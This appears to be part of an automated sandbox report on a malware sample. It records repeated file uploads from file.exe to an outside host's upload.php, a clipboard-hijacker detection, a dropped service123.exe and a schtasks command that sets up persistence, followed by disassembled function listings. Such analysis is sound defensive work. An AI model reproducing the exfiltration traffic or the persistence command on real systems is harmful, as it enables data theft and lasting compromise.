Oct 20, 2024 22:48:28.655307055 CEST	2472	OUT	Data Raw: 5a 27 a9 1b cb 5b 6b b7 d4 cd 11 bf 07 fb 0b f4 20 b9 b3 e3 9e 70 25 6a 38 02 68 dc 57 02 d0 79 e8 0c dc 25 bc 8a 47 dc 42 36 14 17 bc ff 36 29 d9 05 6e b5 40 f1 5c 92 bc bd b5 51 34 4d 06 1a bb 65 dc 19 35 5a 2f b0 b2 ec 1e 45 40 02 12 f5 7f 1f Data Ascii: Z'[k p%j8hWy%GB66)n@\Q4Me5Z/E@&E."4\|,u-0qD45MG}4DQ;\.2\=SS2iR~Pd]4(kWbBZ!D.?_{kUmV&hwyjCTv
Oct 20, 2024 22:48:28.655323029 CEST	2472	OUT	Data Raw: 6b d3 74 12 23 08 ec 82 30 81 e4 ed 73 78 a3 5e 20 7d e2 bb b5 2a bc 76 9c 6b c9 e8 27 e3 ad 5e 94 da 21 46 ab b5 8b 2c b1 4a b8 c2 85 3a 6c ff e0 fc 03 df 3d 59 c3 76 b7 7f 26 5a 10 97 3f af 13 9e 3b 69 ab 8c c1 f1 f5 d3 5a 78 f1 25 5e ea 6e 7c Data Ascii: kt#0sx^ }vk'^!F,J:l=Yv&Z?;iZx%^n\|QOF(^\|Ckf7L5P2[2G+ad(gsG.5.S;DV.~;%V=G]/ZL7i.^R9LQ
Oct 20, 2024 22:48:28.655368090 CEST	2521	OUT	Data Raw: 4d 94 29 ed 98 ef 23 7d 61 67 0c f8 4e 3b 0e e9 57 d0 2d 52 ee f8 3f fe 57 59 e6 57 5e 9f 88 ad b6 94 b7 4f f4 a0 5c 6e f5 4a 19 29 6d 02 3e 47 06 70 69 32 c3 e6 65 a7 1f 08 6c ad 2f a3 5a cb 72 f6 3d 75 33 b0 84 31 45 95 a2 06 7e 65 7d 62 d9 e0 Data Ascii: M)#}agN;W-R?WYW^O\nJ)m>Gpi2el/Zr=u31E~e}b0OXd=){7UBkZPG\zIRo_c Wi>p8y\pR=7(;99> :U_ :Q(79]{{GA&j-1cJZ*

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	49924	193.46.218.44	80	6356	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 22:48:30.147178888 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary85537434 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 29713 Host: sevtbb17sb.top
Oct 20, 2024 22:48:30.147247076 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 38 35 35 33 37 34 33 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4d 61 78 Data Ascii: ------Boundary85537434Content-Disposition: form-data; name="file"; filename="Maxatayot.bin"Content-Type: application/octet-streamoIcvx_V&i4=~Yi]pjA<- )bYa,KpiNQT( UsDmogp1v5y
Oct 20, 2024 22:48:30.152729034 CEST	1236	OUT	Data Raw: ca 6d c4 97 b0 27 97 1f d5 92 55 8d 8f ed 0e 8f 8c 0f 52 44 08 b9 ac 63 09 1b c1 5e ef e9 44 2a 14 0e 11 76 83 44 41 49 ee b6 bd f0 9a 9a b6 33 6d b2 ac 71 8e f0 dd 7f 98 6c 92 74 62 b5 d6 7b 82 2f c2 ba 73 7b 60 ed fc a1 6d 76 a9 39 33 68 e0 df Data Ascii: m'URDc^DvDAI3mqltb{/s{`mv93h9?,.RZmDTqdcRZ9Gv7@&s>%e>.HV]2VqGgx)\m6lYHGCU=S!3&A^VJ$IUn
Oct 20, 2024 22:48:30.152864933 CEST	2472	OUT	Data Raw: 93 2b b0 a6 51 db e6 98 de a3 41 00 ae 73 77 41 b9 8e 4a 69 c1 a5 ce 86 99 cb 41 72 76 0d 34 a1 dd 11 01 80 cb 0a 7a ee a4 11 ad 37 b9 27 87 27 71 00 99 d3 cf 28 76 5b 37 d4 9d 7e fb c6 39 2b 62 5a b0 f5 1b 39 f0 30 8a a2 31 10 2c 2c 2b 51 02 2e Data Ascii: +QAswAJiArv4z7''q(v[7~9+bZ901,,+Q.pNDuzW<)BTGwqq*pIIm!!]Pf}EL#F-wVA0h '!5cY[54./1U?.3k`dtH>b_PX<)
Oct 20, 2024 22:48:30.152892113 CEST	2472	OUT	Data Raw: f1 21 e7 2f a0 8b de 92 9a ba 0a e9 4e 24 39 55 73 37 ee 8f 2e f3 d7 2b 26 4f d7 5d e6 87 0a 33 ad 4b da 50 a2 ce 6e 24 c9 9f 50 aa 90 ae fd ed 00 31 5b 92 14 94 fc 23 d9 8f 49 85 ff b5 63 0a 2c 44 80 af 73 ac 91 33 81 d2 5a cf 65 51 ae b1 ef 9c Data Ascii: !/N$9Us7.+&O]3KPn$P1[#Ic,Ds3ZeQuj#8dOo5<I&CdDUPAf9=P2ELV~.,ra+jBp]Q{pq;E:K*lnEq"J>V>{M-h;Q
Oct 20, 2024 22:48:30.152925014 CEST	2472	OUT	Data Raw: ca 9a 87 30 95 f7 0b 72 5f 9f f6 c7 51 86 83 d6 74 9e e1 4e 35 43 91 a0 2b 3f 43 72 c7 dd 62 39 c8 94 86 f9 ab b1 79 67 32 bb 0b bd d3 52 f6 7f 28 57 46 95 e6 71 b7 a0 4c 9c d2 00 d8 c8 26 ed 8b 61 17 01 a0 a8 7a 07 2b c6 85 2d ef 1f 06 48 fd b1 Data Ascii: 0r_QtN5C+?Crb9yg2R(WFqL&az+-H!#M[6?,_1!G1U?& ;1n`%$`WiFMY7vk@(Y4])T.Z{U4FG\|:@myJ}d8=PA<TX6H
Oct 20, 2024 22:48:30.152995110 CEST	2472	OUT	Data Raw: 36 08 84 94 1b 32 03 9d 68 e0 78 bf 78 8c a6 3c 61 e7 e2 e2 04 e8 49 9d 79 f8 54 e8 08 f1 c1 8a 01 9e 5a d5 db 84 86 55 41 b5 fb 0b ff 50 af 9d 9c d5 0d 5b d8 2c b6 fb 60 30 6a cc d3 ec 47 8a c8 e0 fd 66 21 80 97 aa 60 5a 62 a7 d6 30 69 fa c1 2d Data Ascii: 62hxx<aIyTZUAP[,`0jGf!`Zb0i-fXD IWZv^Vli-q]b$UtT-w(3X)eeo64z g:w88}dxN]3<F"'JqC^OUB
Oct 20, 2024 22:48:30.153023958 CEST	2472	OUT	Data Raw: 5a 27 a9 1b cb 5b 6b b7 d4 cd 11 bf 07 fb 0b f4 20 b9 b3 e3 9e 70 25 6a 38 02 68 dc 57 02 d0 79 e8 0c dc 25 bc 8a 47 dc 42 36 14 17 bc ff 36 29 d9 05 6e b5 40 f1 5c 92 bc bd b5 51 34 4d 06 1a bb 65 dc 19 35 5a 2f b0 b2 ec 1e 45 40 02 12 f5 7f 1f Data Ascii: Z'[k p%j8hWy%GB66)n@\Q4Me5Z/E@&E."4\|,u-0qD45MG}4DQ;\.2\=SS2iR~Pd]4(kWbBZ!D.?_{kUmV&hwyjCTv
Oct 20, 2024 22:48:30.153040886 CEST	2472	OUT	Data Raw: 6b d3 74 12 23 08 ec 82 30 81 e4 ed 73 78 a3 5e 20 7d e2 bb b5 2a bc 76 9c 6b c9 e8 27 e3 ad 5e 94 da 21 46 ab b5 8b 2c b1 4a b8 c2 85 3a 6c ff e0 fc 03 df 3d 59 c3 76 b7 7f 26 5a 10 97 3f af 13 9e 3b 69 ab 8c c1 f1 f5 d3 5a 78 f1 25 5e ea 6e 7c Data Ascii: kt#0sx^ }vk'^!F,J:l=Yv&Z?;iZx%^n\|QOF(^\|Ckf7L5P2[2G+ad(gsG.5.S;DV.~;%V=G]/ZL7i.^R9LQ
Oct 20, 2024 22:48:30.153075933 CEST	2521	OUT	Data Raw: 4d 94 29 ed 98 ef 23 7d 61 67 0c f8 4e 3b 0e e9 57 d0 2d 52 ee f8 3f fe 57 59 e6 57 5e 9f 88 ad b6 94 b7 4f f4 a0 5c 6e f5 4a 19 29 6d 02 3e 47 06 70 69 32 c3 e6 65 a7 1f 08 6c ad 2f a3 5a cb 72 f6 3d 75 33 b0 84 31 45 95 a2 06 7e 65 7d 62 d9 e0 Data Ascii: M)#}agN;W-R?WYW^O\nJ)m>Gpi2el/Zr=u31E~e}b0OXd=){7UBkZPG\zIRo_c Wi>p8y\pR=7(;99> :U_ :Q(79]{{GA&j-1cJZ*

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	49934	193.46.218.44	80	6356	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 22:48:31.853090048 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary85537434 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 29713 Host: sevtbb17sb.top
Oct 20, 2024 22:48:31.853171110 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 38 35 35 33 37 34 33 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4d 61 78 Data Ascii: ------Boundary85537434Content-Disposition: form-data; name="file"; filename="Maxatayot.bin"Content-Type: application/octet-streamoIcvx_V&i4=~Yi]pjA<- )bYa,KpiNQT( UsDmogp1v5y
Oct 20, 2024 22:48:31.858769894 CEST	1236	OUT	Data Raw: ca 6d c4 97 b0 27 97 1f d5 92 55 8d 8f ed 0e 8f 8c 0f 52 44 08 b9 ac 63 09 1b c1 5e ef e9 44 2a 14 0e 11 76 83 44 41 49 ee b6 bd f0 9a 9a b6 33 6d b2 ac 71 8e f0 dd 7f 98 6c 92 74 62 b5 d6 7b 82 2f c2 ba 73 7b 60 ed fc a1 6d 76 a9 39 33 68 e0 df Data Ascii: m'URDc^DvDAI3mqltb{/s{`mv93h9?,.RZmDTqdcRZ9Gv7@&s>%e>.HV]2VqGgx)\m6lYHGCU=S!3&A^VJ$IUn
Oct 20, 2024 22:48:31.858819008 CEST	2472	OUT	Data Raw: 93 2b b0 a6 51 db e6 98 de a3 41 00 ae 73 77 41 b9 8e 4a 69 c1 a5 ce 86 99 cb 41 72 76 0d 34 a1 dd 11 01 80 cb 0a 7a ee a4 11 ad 37 b9 27 87 27 71 00 99 d3 cf 28 76 5b 37 d4 9d 7e fb c6 39 2b 62 5a b0 f5 1b 39 f0 30 8a a2 31 10 2c 2c 2b 51 02 2e Data Ascii: +QAswAJiArv4z7''q(v[7~9+bZ901,,+Q.pNDuzW<)BTGwqq*pIIm!!]Pf}EL#F-wVA0h '!5cY[54./1U?.3k`dtH>b_PX<)
Oct 20, 2024 22:48:31.858854055 CEST	4944	OUT	Data Raw: f1 21 e7 2f a0 8b de 92 9a ba 0a e9 4e 24 39 55 73 37 ee 8f 2e f3 d7 2b 26 4f d7 5d e6 87 0a 33 ad 4b da 50 a2 ce 6e 24 c9 9f 50 aa 90 ae fd ed 00 31 5b 92 14 94 fc 23 d9 8f 49 85 ff b5 63 0a 2c 44 80 af 73 ac 91 33 81 d2 5a cf 65 51 ae b1 ef 9c Data Ascii: !/N$9Us7.+&O]3KPn$P1[#Ic,Ds3ZeQuj#8dOo5<I&CdDUPAf9=P2ELV~.,ra+jBp]Q{pq;E:K*lnEq"J>V>{M-h;Q
Oct 20, 2024 22:48:31.858889103 CEST	2472	OUT	Data Raw: 36 08 84 94 1b 32 03 9d 68 e0 78 bf 78 8c a6 3c 61 e7 e2 e2 04 e8 49 9d 79 f8 54 e8 08 f1 c1 8a 01 9e 5a d5 db 84 86 55 41 b5 fb 0b ff 50 af 9d 9c d5 0d 5b d8 2c b6 fb 60 30 6a cc d3 ec 47 8a c8 e0 fd 66 21 80 97 aa 60 5a 62 a7 d6 30 69 fa c1 2d Data Ascii: 62hxx<aIyTZUAP[,`0jGf!`Zb0i-fXD IWZv^Vli-q]b$UtT-w(3X)eeo64z g:w88}dxN]3<F"'JqC^OUB
Oct 20, 2024 22:48:31.858916044 CEST	2472	OUT	Data Raw: 5a 27 a9 1b cb 5b 6b b7 d4 cd 11 bf 07 fb 0b f4 20 b9 b3 e3 9e 70 25 6a 38 02 68 dc 57 02 d0 79 e8 0c dc 25 bc 8a 47 dc 42 36 14 17 bc ff 36 29 d9 05 6e b5 40 f1 5c 92 bc bd b5 51 34 4d 06 1a bb 65 dc 19 35 5a 2f b0 b2 ec 1e 45 40 02 12 f5 7f 1f Data Ascii: Z'[k p%j8hWy%GB66)n@\Q4Me5Z/E@&E."4\|,u-0qD45MG}4DQ;\.2\=SS2iR~Pd]4(kWbBZ!D.?_{kUmV&hwyjCTv
Oct 20, 2024 22:48:31.858994961 CEST	2472	OUT	Data Raw: 6b d3 74 12 23 08 ec 82 30 81 e4 ed 73 78 a3 5e 20 7d e2 bb b5 2a bc 76 9c 6b c9 e8 27 e3 ad 5e 94 da 21 46 ab b5 8b 2c b1 4a b8 c2 85 3a 6c ff e0 fc 03 df 3d 59 c3 76 b7 7f 26 5a 10 97 3f af 13 9e 3b 69 ab 8c c1 f1 f5 d3 5a 78 f1 25 5e ea 6e 7c Data Ascii: kt#0sx^ }vk'^!F,J:l=Yv&Z?;iZx%^n\|QOF(^\|Ckf7L5P2[2G+ad(gsG.5.S;DV.~;%V=G]/ZL7i.^R9LQ
Oct 20, 2024 22:48:31.859129906 CEST	2521	OUT	Data Raw: 4d 94 29 ed 98 ef 23 7d 61 67 0c f8 4e 3b 0e e9 57 d0 2d 52 ee f8 3f fe 57 59 e6 57 5e 9f 88 ad b6 94 b7 4f f4 a0 5c 6e f5 4a 19 29 6d 02 3e 47 06 70 69 32 c3 e6 65 a7 1f 08 6c ad 2f a3 5a cb 72 f6 3d 75 33 b0 84 31 45 95 a2 06 7e 65 7d 62 d9 e0 Data Ascii: M)#}agN;W-R?WYW^O\nJ)m>Gpi2el/Zr=u31E~e}b0OXd=){7UBkZPG\zIRo_c Wi>p8y\pR=7(;99> :U_ :Q(79]{{GA&j-1cJZ*

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	49941	193.46.218.44	80	6356	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 22:48:33.644505978 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary85537434 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 29713 Host: sevtbb17sb.top
Oct 20, 2024 22:48:33.644558907 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 38 35 35 33 37 34 33 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4d 61 78 Data Ascii: ------Boundary85537434Content-Disposition: form-data; name="file"; filename="Maxatayot.bin"Content-Type: application/octet-streamoIcvx_V&i4=~Yi]pjA<- )bYa,KpiNQT( UsDmogp1v5y
Oct 20, 2024 22:48:33.649328947 CEST	1236	OUT	Data Raw: ca 6d c4 97 b0 27 97 1f d5 92 55 8d 8f ed 0e 8f 8c 0f 52 44 08 b9 ac 63 09 1b c1 5e ef e9 44 2a 14 0e 11 76 83 44 41 49 ee b6 bd f0 9a 9a b6 33 6d b2 ac 71 8e f0 dd 7f 98 6c 92 74 62 b5 d6 7b 82 2f c2 ba 73 7b 60 ed fc a1 6d 76 a9 39 33 68 e0 df Data Ascii: m'URDc^DvDAI3mqltb{/s{`mv93h9?,.RZmDTqdcRZ9Gv7@&s>%e>.HV]2VqGgx)\m6lYHGCU=S!3&A^VJ$IUn
Oct 20, 2024 22:48:33.652430058 CEST	2472	OUT	Data Raw: 93 2b b0 a6 51 db e6 98 de a3 41 00 ae 73 77 41 b9 8e 4a 69 c1 a5 ce 86 99 cb 41 72 76 0d 34 a1 dd 11 01 80 cb 0a 7a ee a4 11 ad 37 b9 27 87 27 71 00 99 d3 cf 28 76 5b 37 d4 9d 7e fb c6 39 2b 62 5a b0 f5 1b 39 f0 30 8a a2 31 10 2c 2c 2b 51 02 2e Data Ascii: +QAswAJiArv4z7''q(v[7~9+bZ901,,+Q.pNDuzW<)BTGwqq*pIIm!!]Pf}EL#F-wVA0h '!5cY[54./1U?.3k`dtH>b_PX<)
Oct 20, 2024 22:48:33.652450085 CEST	2472	OUT	Data Raw: f1 21 e7 2f a0 8b de 92 9a ba 0a e9 4e 24 39 55 73 37 ee 8f 2e f3 d7 2b 26 4f d7 5d e6 87 0a 33 ad 4b da 50 a2 ce 6e 24 c9 9f 50 aa 90 ae fd ed 00 31 5b 92 14 94 fc 23 d9 8f 49 85 ff b5 63 0a 2c 44 80 af 73 ac 91 33 81 d2 5a cf 65 51 ae b1 ef 9c Data Ascii: !/N$9Us7.+&O]3KPn$P1[#Ic,Ds3ZeQuj#8dOo5<I&CdDUPAf9=P2ELV~.,ra+jBp]Q{pq;E:K*lnEq"J>V>{M-h;Q
Oct 20, 2024 22:48:33.652594090 CEST	4944	OUT	Data Raw: ca 9a 87 30 95 f7 0b 72 5f 9f f6 c7 51 86 83 d6 74 9e e1 4e 35 43 91 a0 2b 3f 43 72 c7 dd 62 39 c8 94 86 f9 ab b1 79 67 32 bb 0b bd d3 52 f6 7f 28 57 46 95 e6 71 b7 a0 4c 9c d2 00 d8 c8 26 ed 8b 61 17 01 a0 a8 7a 07 2b c6 85 2d ef 1f 06 48 fd b1 Data Ascii: 0r_QtN5C+?Crb9yg2R(WFqL&az+-H!#M[6?,_1!G1U?& ;1n`%$`WiFMY7vk@(Y4])T.Z{U4FG\|:@myJ}d8=PA<TX6H
Oct 20, 2024 22:48:33.652698040 CEST	4944	OUT	Data Raw: 5a 27 a9 1b cb 5b 6b b7 d4 cd 11 bf 07 fb 0b f4 20 b9 b3 e3 9e 70 25 6a 38 02 68 dc 57 02 d0 79 e8 0c dc 25 bc 8a 47 dc 42 36 14 17 bc ff 36 29 d9 05 6e b5 40 f1 5c 92 bc bd b5 51 34 4d 06 1a bb 65 dc 19 35 5a 2f b0 b2 ec 1e 45 40 02 12 f5 7f 1f Data Ascii: Z'[k p%j8hWy%GB66)n@\Q4Me5Z/E@&E."4\|,u-0qD45MG}4DQ;\.2\=SS2iR~Pd]4(kWbBZ!D.?_{kUmV&hwyjCTv
Oct 20, 2024 22:48:33.653090000 CEST	2521	OUT	Data Raw: 4d 94 29 ed 98 ef 23 7d 61 67 0c f8 4e 3b 0e e9 57 d0 2d 52 ee f8 3f fe 57 59 e6 57 5e 9f 88 ad b6 94 b7 4f f4 a0 5c 6e f5 4a 19 29 6d 02 3e 47 06 70 69 32 c3 e6 65 a7 1f 08 6c ad 2f a3 5a cb 72 f6 3d 75 33 b0 84 31 45 95 a2 06 7e 65 7d 62 d9 e0 Data Ascii: M)#}agN;W-R?WYW^O\nJ)m>Gpi2el/Zr=u31E~e}b0OXd=){7UBkZPG\zIRo_c Wi>p8y\pR=7(;99> :U_ :Q(79]{{GA&j-1cJZ*
Oct 20, 2024 22:48:34.967948914 CEST	209	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 (Ubuntu) Date: Sun, 20 Oct 2024 20:48:34 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: close ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Target ID:	0
Start time:	16:47:05
Start date:	20/10/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x2d0000
File size:	7'257'088 bytes
MD5 hash:	0DDAF55FF5B6DAF269845DEE74B4F24B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Clipboard_Hijacker_5, Description: Yara detected Clipboard Hijacker, Source: 00000000.00000003.2969253307.0000000004057000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	16:49:13
Start date:	20/10/2024
Path:	C:\Users\user\AppData\Local\Temp\service123.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\service123.exe"
Imagebase:	0x2d0000
File size:	314'617'856 bytes
MD5 hash:	65DFC01E9903D5B061EA2A791EC0F5AD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	16:49:13
Start date:	20/10/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Imagebase:	0x650000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	16:49:13
Start date:	20/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	16:49:16
Start date:	20/10/2024
Path:	C:\Users\user\AppData\Local\Temp\service123.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\/service123.exe
Imagebase:	0x2d0000
File size:	314'617'856 bytes
MD5 hash:	65DFC01E9903D5B061EA2A791EC0F5AD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	16:50:02
Start date:	20/10/2024
Path:	C:\Users\user\AppData\Local\Temp\service123.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\/service123.exe
Imagebase:	0x2d0000
File size:	314'617'856 bytes
MD5 hash:	65DFC01E9903D5B061EA2A791EC0F5AD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	16:51:02
Start date:	20/10/2024
Path:	C:\Users\user\AppData\Local\Temp\service123.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\/service123.exe
Imagebase:	0x2d0000
File size:	314'617'856 bytes
MD5 hash:	65DFC01E9903D5B061EA2A791EC0F5AD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	0.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	61.1%
Total number of Nodes:	72
Total number of Limit Nodes:	3

Executed Functions

Function 6C2E14B0 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_open.MSVCRT ref: 6C2E14CD
_exit.MSVCRT ref: 6C2E151A
_write.MSVCRT ref: 6C2E156A
_close.MSVCRT ref: 6C2E1579

Strings

CONOUT$, xrefs: 6C2E14C6
,p@l, xrefs: 6C3B4AED
@, xrefs: 6C3B4AB1
terminated, xrefs: 6C2E1540

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: _close_exit_open_write
String ID: terminated$,p@l$@$CONOUT$
API String ID: 28676597-1575579655
Opcode ID: e2b07b53ae01ce9c2e19770caf2df3a57a9e4c6a5d5203cef677db23b738225c
Instruction ID: e90565b00b5ea8f8f7578694f66f162449ba1c7ca73ea55b5453c6ae6bbd0d78
Opcode Fuzzy Hash: e2b07b53ae01ce9c2e19770caf2df3a57a9e4c6a5d5203cef677db23b738225c
Instruction Fuzzy Hash: AF4139B0A483099FDB00EF79C54465EBBF4AF49318F508A2DE8A5E7A41E335C445CF56

Function 002D116C Relevance: 19.7, APIs: 13, Instructions: 200
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 002D11B7
SetUnhandledExceptionFilter.KERNEL32 ref: 002D1238
__p__acmdln.MSVCRT ref: 002D1261
malloc.MSVCRT ref: 002D12EB
strlen.MSVCRT ref: 002D1323
malloc.MSVCRT ref: 002D132E
memcpy.MSVCRT ref: 002D1344
GetStartupInfoA.KERNEL32 ref: 002D1433

Memory Dump Source

Source File: 00000006.00000002.4154326212.00000000002D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000006.00000002.4154283382.00000000002D0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154347821.00000000002DA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154373639.00000000002DE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154403325.00000000002E1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_service123.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdlnmemcpystrlen
String ID:
API String ID: 1672962128-0
Opcode ID: d9a2e5573868dfcedee766f1d12d9ca8c7479445ac0b87748bb6883a3288b73a
Instruction ID: bfdba78a42c7780edccdb69a6de97265f0f2b994622330a9df06cd3717731d57
Opcode Fuzzy Hash: d9a2e5573868dfcedee766f1d12d9ca8c7479445ac0b87748bb6883a3288b73a
Instruction Fuzzy Hash: F581AC71E256119FDB10EFA4E88836ABBE0FB84301F10852FD9898B751D7759C69CB82

Function 002D15B0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_open.MSVCRT ref: 002D15CD
_exit.MSVCRT ref: 002D161A
_write.MSVCRT ref: 002D166A
_close.MSVCRT ref: 002D1679

Strings

@, xrefs: 002D8341
CONOUT$, xrefs: 002D15C6
terminated, xrefs: 002D1640

Memory Dump Source

Source File: 00000006.00000002.4154326212.00000000002D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000006.00000002.4154283382.00000000002D0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154347821.00000000002DA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154373639.00000000002DE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154403325.00000000002E1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_service123.jbxd

Similarity

API ID: _close_exit_open_write
String ID: terminated$@$CONOUT$
API String ID: 28676597-491099378
Opcode ID: 08757ada45104f9f35bf00dfb6ea1166ca0e2490f298d58bff4d56703888f2e4
Instruction ID: 3f23f9ebead323c9e4dd49d8566e7dceec091dfcbaf7e2baee68531a2e064b53
Opcode Fuzzy Hash: 08757ada45104f9f35bf00dfb6ea1166ca0e2490f298d58bff4d56703888f2e4
Instruction Fuzzy Hash: 0C413AB09243019FDB00EF79D84866EBBF4AB84314F10892EE899D7350E774DC65CB52

Function 002D81E0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 116
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,002D138E,?,?,00006EA2,002D138E), ref: 002D8271
GetProcAddress.KERNEL32 ref: 002D828B
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,002D138E,?,?,00006EA2,002D138E), ref: 002D829D

Strings

yvOEQDJQAYmjmcCBIBxD, xrefs: 002D827E
